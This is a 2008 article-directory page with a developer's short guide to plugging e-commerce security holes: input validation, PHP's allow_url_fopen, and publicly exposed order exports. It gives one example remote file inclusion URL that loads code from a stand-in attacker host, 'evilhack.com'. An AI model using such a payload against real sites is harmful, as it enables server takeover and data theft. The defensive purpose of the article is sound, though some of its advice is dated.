Article Sphere Logo
"Ecommerce" Article
 Article Directory Home All Categories Internet And E-Business Ecommerce

E-Commerce Security - Plugging the Security Holes

By Expert Author: Paul Roberts | View Article Summary
Word Count: 520 words | Views: 112 view(s)
Paul Roberts

Security in an e-commerce website needs to be a major consideration when developing an e-commerce website or software. A developer needs to be aware of all the security considerations when designing a site. With e-commerce becoming more commonplace these days, the number of security attacks is certainly increasing. Paranoia is a healthy thing for e-commerce site developers, we need to keep up to gate with security issues, and keep our ears and eyes open. Though the following loopholes are serious, the following loopholes if present are easily fixed.

Listed below are some security considerations to be included when developing a site. This article does not cover e-shoplifting, please see my separate article on this.

User input - every input, whether it be entering a quantity, searching for a product, entering a name etc, needs to be validated for suspicious characters. If this is not done, it is possible to enter “?>”, the closing end tags of PHP and execute some PHP code.

It is far safer allow numbers and characters a-z (capitals included) and 0-9 and nothing else, rather than make a list of all the character that shouldn’t be there. The validation script needs to scroll through each character one by one. This needs to be achieved using in server side validation, not Javascript. Using server side input validation is essential to keep out unwanted characters

There exists another major when executing PHP code. When using PHP there is a setting called allow_url_fopen which enables the opening of files from a PHP script. This setting should be turned off, unless absolutely necessary.

Just imagine you have PHP scripts for both fixed headers and footers, and to access your webpages you would type in http://www.mysite.com/index.php?page=page2. All it takes is a malicious user to run a script by modifying these parameters by typing in “http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt” with some PHP code in the file “hacker.txt”. You could have anything happen, PHP files read, deleted, vital information stolen.

If you are not sure if this setting is on or off, please copy the following PHP code into a text file, and upload it to your web server:

phpinfo();
?>

When you access your script on your webserver, you should come across the setting allow_url_fopen under configuration.

A computer user, under normal circumstances cannot find the value of this setting.

Be careful of exported data like orders, products in CSV and mySQL files. If this data is exported from a script and is kept on the web server under a common file name ie. http://www.mysite.com/admin/output_tables.csv. This is only really a problem when the exported data resides in a file in a directory that is publicly accessible. There is two ways to prevent this security loophole - First have the output file behind a password protected directory, secondly have the data located inside a HTML textarea form element on a script. The storeowner can then copy this information from the textfile and create a new file on their computer and paste the information here.

All it takes is a hacker to find this filename by checking out the e-commerce software’s demo website and look for the same filename on a real site.
About the Author/Author Bio

Paul Roberts
I run a software development company specialising in E-Commerce, Search Engine Optimization, and Print Estimation software called ROBO Design Solutions. I also develop New Zealand E-Commerce Solutions and Software under the name ROBO Design.

Article Source: http://www.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Tags: ecommerce, e-commerce, security, loophole, loopholes, plugging, secure, validation

Article Submitted: 2008-06-05 | This Article has been viewed 112 times.

Comments on this Article


More "Ecommerce" Related Articles

 
 

Listed below are more articles related to the above article from the "Ecommerce" article category.

People interested in the above article "E-Commerce Security - Plugging the Security Holes" are also interested in the related articles listed below:

 
Just a couple of days back I was having a chat with my friend. He was celebrating his baby’s 1st birthday and had to run between his native in Kerala and Chennai, his working place. He and his better half traveled between these places at least 4 times in last one month.
If you have been doing e-commerce for any amount of time, you would have known that there are more scamers than genuine providers of wholesale dropship directory services. In the world of e-business, Salehoo and Worldwide Brands are both reputable service providers that have gained popularity in the past several years.
If you have ever been an online retailer, you probably have already heard about Salehoo or even used it to your advantage. If you are just starting out with your business, you might be confused with the mixed Salehoo reviews out there. Now, let us take a look at what Salehoo is really all about and the services they offer which many tend to overlook.
How many people do you know that have purchased something online? If your like me quite a few, that’s why ecommerce is the world’s new online shopping mall. But who runs these online retail stores? People just like you and me, that’s why this business is booming and will continue to boom now and well into the future.
If you are a huge fan of the latest electronic products, you might be tempted by the idea of running your own electronics business online. It is not that hard to get started when you take the full advantage of the right drop shipping electronics service and there are plenty for you to choose from.
Did you ever go into your local convenience store and wonder what it would be like if you owned it? Would you be a good owner, will the people like you ? Well this article will show you the benefits of owning your own online retail store, or commonly known as e-commerce that differs from a real local convenience store.
Online Escrow Fraud is becoming rampant. The word unscrupulous does not go far enough to describe those who seek to gain by others’ misfortune or bad luck; we have to add words like devious, deceitful, cunning, and not least of all merciless and cruel. There are, however, good ways to fight it. You owe it to yourself to stay informed on this important topic.
 
Article Directory Home All Categories Internet And E-Business Ecommerce
 

Can't find what you're looking for? Try Google Search!
 
 
(We serve worldwide - Locations updated as at Sunday, 05 July 2009 01:11 pm , Singapore)
United States of America, USA . United Kingdom, UK (England, Scotland, Wales, Northern Ireland) . Canada . Afghanistan . Albania . Algeria . American Samoa . Andorra . Angola . Anguilla . Antarctica . Antigua & Barbuda . Argentina . Armenia . Aruba . Australia . Austria . Azerbaijan . Bahamas . Bahrain . Bangladesh . Barbados . Belarus . Belgium . Belize . Benin . Bermuda . Bhutan . Bolivia . Bonaire . Bosnia-Herzegovina . Botswana . Brazil . British Virgin Islands . Brunei Darrusalam . Bulgaria . Burkina Faso . Burundi . Cambodia . Cameroon . Cape Verde . Cayman Islands . Central African Republic . Chad . Channel Islands . Chile . China . Christmas Island . Colombia . Comoros . Congo . Congo (Dem. Rep.) . Cook Islands . Costa Rica . Cote d'Ivoire . Croatia . Cuba . Curacao . Cyprus . Czech Republic . Denmark . Djibouti . Dominica . Dominican Republic . East Timor . Ecuador . Egypt . El Salvador . Equatorial Guinea . Eritrea . Estonia . Ethiopia . Falkland Islands and Dependencies . Faroe Islands . Fiji . Finland . France . French Guiana . French Polynesia . Gabon . Gambia . Gaza . Georgia . Germany . Ghana . Gibraltar . Greece . Greenland . Grenada . Guadeloupe . Guam . Guatemala . Guinea . Guinea-Bissau . Guyana . Haiti . Hawaiian Islands . Honduras . Hong Kong . Hungary . Iceland . India . Indonesia . Iran . Iraq . Isle Of Man . Israel . Italy . Ivory Coast . Jamaica . Japan . Johnston Atoll . Jordan . Kazakhstan . Kenya . Kiribati . Korea (North) . Korea (South) . Kuwait . Kyrgyzstan . Laos . Latvia . Lebanon . Leeward Islands . Lesotho . Liberia . Libya . Liechtenstein . Lithuania . Luxembourg . Macau . Macedonia . Madagascar . Malawi . Malaysia . Maldives . Mali . Malta . Marshall Islands . Martinique . Mauritania . Mauritius . Mexico . Micronesia (Federated States) . Midway Islands . Moldova . Monaco . Mongolia . Montserrat . Morocco . Mosquito Coast . Mozambique . Myanmar (Burma) . Namibia . Nauru . Navassa Island . Nepal . Netherlands . Netherlands Antilles . New Caledonia . New Zealand . Nicaragua . Niger . Nigeria . Niue . Norfolk Island . Northern Mariana Islands . Norway . Oman . Pakistan . Palau . Palestine . Panama . Papua New Guinea . Paracel Islands . Paraguay . Peru . Philippines . Pitcairn Islands . Poland . Portugal . Puerto Rico . Qatar . Reunion . Romania . Russia . Rwanda . Ryukyu Islands . Saint Helena . Saint Kitts and Nevis . Saint Lucia . Saint Pierre & Miquelon . Saint Vincent & The Grenadines . Samoa . San Marino . Sao Tome & Principe . Saudi Arabia . Senegal . Serbia . Seychelles . Sierra Leone . Singapore . Slovakia . Slovenia . Solomon Islands . Somalia . South Africa . Spain . Sri Lanka . Sudan . Suriname . Swaziland . Sweden . Switzerland . Syria . Taiwan . Tajikistan . Tanzania . Thailand . Togo . Tonga . Transkei . Trinidad & Tobago . Tunisia . Turkey . Turkmenistan . Turks and Caicos Islands . Tuvalu . US Virgin Islands . Uganda . Ukraine . United Arab Emirates . Upper Volta . Uruguay . Uzbekistan . Vanuatu . Vatican City (Holy See) . Venezuela . Vietnam . Wake Island . Windward Islands . Yemen . Yugoslavia . Zaire . Zambia . Zimbabwe
Copyright © 2005 - by Larry Lim, Singapore - Article Search Engine Directory at ArticleSphere.com™
All Rights Reserved Worldwide. All Trademarks and Servicemarks are the property of the respective owners.
French Spanish Bulgarian Chinese (Simplified) Chinese (Traditional) Croation Czech Danish Dutch Finnish German Greek Italian Japanese Korean Norwegian Polish Portuguese Romanian Russian Serbian Slovak Swedish Arabic Hebrew Hungarian Thai Turkish English US